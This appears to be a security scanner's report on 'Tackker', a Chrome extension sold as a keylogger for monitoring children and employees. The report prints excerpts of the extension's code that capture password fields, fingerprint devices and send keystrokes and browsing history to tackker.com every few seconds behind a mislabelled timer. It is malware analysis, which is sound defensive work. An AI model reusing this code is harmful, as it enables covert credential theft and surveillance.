Security Alert: Malware Risk Confirmed
Free Keylogger Tool - Child Monitor Tackker
ID: ekpkdmohpdnebfedjjfklhpefgpgaaji
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author
- tackker.comView Profile
- Privacy
- Privacy Policy
- MX records exist
- Yes
- Domain exists
- Yes
- Is disposable
- No
- Is role-based
- No
- Mailbox exists
- Yes
- Website
- Visit
Tackker is a free keylogger tool that helps you in Child Monitoring and other ethical monitoring services.
tackker is online keylogger tool that helps you log the keystrokes and other user data. It can be used for child monitoring as well as employee monitoring. And Now You can also monitor your browsing history. Install Tackker and get peace of mind ;) tackker have made browser activity monitoring so easy. Monitor any browser activity by following these simple steps: 1) Install tackker on target system browser(s). 2) After installation, you will be directed to register/login (this part is important since without registering you can not see the logged data). 3) Once you are registered and the plugin is installed , simply monitor user activity from our online dashboard.
The dontLog exclusion list omits 'password' type inputs, meaning password field values are captured by getInputValue() and persisted via saveData(). Capturing credentials across all websites (<all_urls> content script) constitutes credential theft beyond what the 'Web history, User activity' CWS disclosure authorises.
var watchedElements = ["INPUT", "TEXTAREA"], url = window.location, dontLog = ["button", "image", "reset", "submit", "radio", "checkbox", "color", "range"];function getInputValue(t) { var e = ~watchedElements.indexOf(t.nodeName) || "true" === t.contentEditable; if (-1 === e) { if (!~dontLog.indexOf(t.type)) return t.value } else { if (-2 === e) return t.value; if (!0 === e) return t.innerText.trim() .replace(/(\n|\r)+/g, " \n") } return null}The comment 'six hours in milliseconds' is deliberately false: 5*1000 = 5000 ms = 5 seconds, not 6 hours (which would be 21,600,000 ms). This intentional mislabelling hides from code reviewers that keystroke and browsing history payloads are exfiltrated to tackker.com on every user click once 5 seconds have elapsed — a near-continuous exfiltration rate, not a throttled one.
// 6 hours in millisecondsvar sixHours = 5 * 1000;// var fiveMinutes = 5 * 60 * 1000; // 5 minutes in millisecondsif (now - lastSent >= sixHours) { // Proceed with data sending logic chrome.storage.local.get({ key: [] }, function(resultData) { var data = resultData.key; chrome.storage.local.get(["lastKeySent", "history"], function(lastKeyData) { if (typeof lastKeyData.lastKeySent === 'number' && lastKeyData.lastKeySent < data.length - 1) { chrome.storage.local.get(['appId'], function(result) { appId = result.appId; if (appId && alreadySent === false) { alreadySent = true; var temp = data.slice(lastKeyData.lastKeySent + 1, data.length); var json = JSON.stringify({ 'app': appId, 'data': temp, 'history': lastKeyData.history }); var request = $.ajax({ url: "https://www.tackker.com/send-data",The saveHistory function collects a device fingerprint — user agent string, browser name and version, OS name, device model, accept-language, navigation method, referrer, and content type — for every URL visited across all sites. This goes substantially beyond the 'Web history' CWS disclosure and constitutes covert device-level fingerprint tracking bundled into the same payload as keystroke data.
var newEntry = { 'url': document.location.href, 'content_type': contentType, 'timestamp': today.getTime(), 'referrer': lastUrl, 'navigation_method': navigationMethod, 'user_agent': navigator.userAgent, 'scheme': window.location.protocol, 'host': window.location.host, 'accept_language': navigator.language, 'device_manufacturer': 'unknown', 'device_model': getBasicDeviceModel(), 'os_name': getOS(), 'os_version': 'unknown', 'browser_name': browserInfo.browserName, 'browser_version': browserInfo.browserVersion, 'navigation_type': 'foreground-navigation', 'year': today.getFullYear(), 'month': today.getMonth() + 1, 'day': today.getDate(),}The bundled manifest omits the 'alarms' permission and the explicit host_permissions field that appear in the live CWS listing (published manifest shows permissions: [storage, unlimitedStorage, alarms] and host_permissions: [<all_urls>]). The missing 'alarms' permission suggests the published extension has timer-driven background capabilities absent from this analysed bundle, indicating the publisher may be shipping a modified build through the store update pipeline.
{ "manifest_version": 3, "permissions": [ "storage", "unlimitedStorage" ]}By severity
Versions scanned
Showing 3 of 18 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 3.1 | 4 |
| 3.0 | 10 |
| 1.7 | 4 |
Files with findings
4 distinct paths — top paths by unique finding count:
- content.js12
- back.js3
- popup.js2
- manifest.json1
URLs
View the external URLs this extension communicates with to understand its network activity and data interactions.
Gain full insight into all external connections.
Upgrade for full visibility.
Gain full insight into all external connections.
Upgrade for full visibility.
Code Diff
Compare extension code between any two versions.
No comparable text files found between these versions.
Browse and explore files within this extension package
Gain full insight into all external connections.
Upgrade for full visibility.